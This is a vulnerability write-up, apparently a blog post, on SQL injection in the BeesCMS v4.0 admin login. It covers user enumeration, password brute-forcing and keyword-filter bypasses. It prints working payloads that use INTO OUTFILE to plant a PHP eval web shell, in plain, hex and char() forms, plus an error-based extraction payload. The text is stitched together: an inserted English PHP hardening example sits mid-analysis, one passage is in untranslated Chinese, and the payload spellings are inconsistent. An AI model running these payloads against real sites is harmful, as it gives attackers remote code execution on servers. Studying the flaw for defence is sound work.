Beescms_v4.0 sql injection vulnerability analysis

First, vulnerability description

The admin (background) login code of BeesCMS v4.0 has design defects that allow the global input protection to be bypassed, resulting in SQL injection.

Second, building the vulnerability environment

1. Download BeesCMS v4.0 from the official site: http://beescms.com/cxxz.html

2. Extract the archive and place the files in the phpStudy web root.

3. Open http://192.168.10.171/beescms/install in a browser to start the installation.

4. Click Next until the following screen appears, then enter the database account and password.

5. The installation completes successfully.

6. Edit mysql.ini and add the entry secure_file_priv = under [mysqld], save it, then restart phpStudy; otherwise MySQL reports an error when writing files.

  

Third, affected version

Beescms v4.0

Fourth, vulnerability reproduction

1. Open the admin page http://192.168.10.171/beescms/admin/ in a browser.

2. Enter an arbitrary user name and password; the prompt "The management user does not exist" appears, so user names can be enumerated, and the password of an enumerated user name can then be brute-forced.

3. Enumerating user names with Burp Suite reveals a design flaw in the code: after the request has been verified once, it can be resubmitted many times without being refreshed, so an attacker can eventually brute-force (fuzz) the login.

  

4. Brute-forcing passwords for the enumerated user name finds a valid password.

5. Entering a single quote in the user name produces an error, indicating a SQL injection vulnerability.

6. Looking at the source code, the user name and password inputs are filtered with the fl_value function and the fl_html function.

7. Following fl_value, we find that it filters key input: almost all common SQL keywords are removed.

8. Following fl_html, it uses the htmlspecialchars function to HTML-escape special symbols in the input, mainly as a defence against XSS vulnerabilities.

9. A Baidu search for the htmlspecialchars function shows that by default it encodes only double quotes; this version of the CMS uses the default parameters for the filtering, so a single quote can be introduced here, which is the loophole.

10. Continuing through the code, we find the login verification function check_login.

11. Following check_login, it first verifies the user name and then verifies that the password is correct; the loophole lies in this validation logic.

12. Manual fuzzing

12.1 Manual testing finds that keywords such as union and select are filtered.

12.2 From the source analysis above, the following bypasses are found:

union => uni union on

select => selselectect
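The two defects found in steps 6 to 9 and exploited in 12.2 are illustrated below in an added PHP example that is not BeesCMS code: strip_once() is a hypothetical stand-in for a filter that removes each keyword once (like fl_value), the ENT_COMPAT flag reproduces the htmlspecialchars() default of PHP versions before 8.1 (which is what the CMS relies on), and find_admin() shows the hardened lookup with a bound parameter over a hypothetical in-memory SQLite table.

```php
<?php
// Added example (not BeesCMS code). Run with: php example.php

// Hypothetical stand-in for a keyword filter that removes each keyword
// once: the inner occurrence is removed and the two halves rejoin.
function strip_once(string $s): string {
    return preg_replace('/select|union|into|outfile/i', '', $s);
}

// htmlspecialchars() with ENT_COMPAT (the default before PHP 8.1):
// '"' becomes &quot; but "'" is passed through unchanged.
function html_filter(string $s): string {
    return htmlspecialchars($s, ENT_COMPAT);
}

function check(bool $ok, string $what): void {
    if (!$ok) { throw new RuntimeException("failed: $what"); }
    echo "ok: $what\n";
}

check(strip_once('selselectect') === 'select', 'nested keyword survives strip-once filter');
check(html_filter('admin"') === 'admin&quot;', 'double quote is encoded');
check(html_filter("admin'") === "admin'", 'single quote is left intact');

// Hardened lookup: the user name is bound as a parameter, never spliced
// into the SQL text, so neither a keyword list nor quote escaping is needed.
// Table and columns are hypothetical; SQLite in memory keeps it stand-alone.
function find_admin(PDO $db, string $user): ?array {
    $stmt = $db->prepare('SELECT id, admin_name FROM admin WHERE admin_name = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, admin_name TEXT)');
$db->exec("INSERT INTO admin (admin_name) VALUES ('admin')");

// The nested-keyword string from the write-up is now just an unmatched literal.
check(find_admin($db, "admin' uni union on selselectect 1,2,3,4,5#") === null, 'injection string matches no row');
check(find_admin($db, 'admin')['admin_name'] === 'admin', 'legitimate name still found');
```

The file write in 12.4 also relied on step 6 of the setup, which left secure_file_priv empty, and on a database account holding the FILE privilege; keeping secure_file_priv pointed at a restricted directory and running the CMS with an account without FILE blocks INTO OUTFILE regardless of the filter.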

  

12.3, guess the number of fields in the SQL query solution, according to the following figure, it is determined that the number of fields of the SQL query statement 5

  

12.4 attempts through SQL injection getshell

12.4.1, write a word to the next target site root, payload as follows:

admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[cmd]);?> into  outfile 'C:/phpStudy/WWW/beescms/shell.php'#

12.4.2 Capture the request in Burp Suite, edit it and replay it. The error below appears; from the response it can be seen that htmlspecialchars has HTML-escaped the special symbols in the input, and that the into and outfile keywords are filtered.

12.4.3 Manual testing of bypasses for the keyword filter:

outfile => outoutfilefile

into => in into

  

12.4.4、通过上面的分析,发现php函数htmlspecialchars()对输入中含有的特殊符号进行html实体化转义,导致不能写shell到目标服务器上。可以通过利用mysql注入的一个特性就可以达到注入效果(即对shell部分进行Hex编码),或者用mysql函数char()就可以绕过这里的限制。

方法一、Hex编码

1、 对shell部分进行编码

  

2、 写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数

unhex(3c3f70687020406576616c28245f504f53545b636d645d293b3f3e),但是本次实验用unhex函数一直失败

admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e  in into  outoutfilefile 'C:/phpStudy/WWW/beescms/shell.php'#

3. Modify the packet in Burp; the shell is written successfully.

4. Connect with Caidao (China Chopper).

Method 2: Using the char function

1. The MySQL built-in function char() converts its ASCII-code arguments into a string; Python is used for a quick conversion.

2. Construct the payload:

admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62)  in into  outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

3. Modify the packet in Burp; the shell is written successfully.

4. Connect with Caidao (China Chopper).

Postscript:

1. Testing shows that, besides boolean-based injection, the user field is also vulnerable to error-based injection.

2. Construct the payload as follows:

admin' a and nd extractvalue(1,concat(0x7e,(select user()),0x7e))#


---------------------------------------------------------------------------

References: https://www.ohlinge.cn/php/beescms_sqli.html

https://www.ohlinge.cn/php/beescms_login_sql.html

Origin www.cnblogs.com/yuzly/p/11423384.html